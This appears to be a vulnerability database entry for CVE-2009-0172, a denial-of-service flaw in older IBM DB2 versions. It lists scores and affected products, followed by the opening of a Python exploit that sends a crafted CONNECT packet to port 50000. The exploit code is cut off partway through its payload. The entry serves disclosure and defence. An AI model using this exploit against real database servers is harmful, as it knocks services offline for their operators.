CVE-2009-0172

Published: 16/01/2009 Updated: 08/08/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Unspecified vulnerability in IBM DB2 8 before FP17a, 9.1 before FP6a, and 9.5 before FP3a allows remote malicious users to cause a denial of service (infinite loop) via a crafted CONNECT data stream.

Vulnerable Product

ibm db2 universal database 9.1

ibm db2 universal database 9.5

Exploits

# Discovered by Dennis Yurichev <dennis@conusinfo>
# DB2TEST database should be present on target system
from sys import *
from socket import *
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect((argv[1], 50000))
sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x ...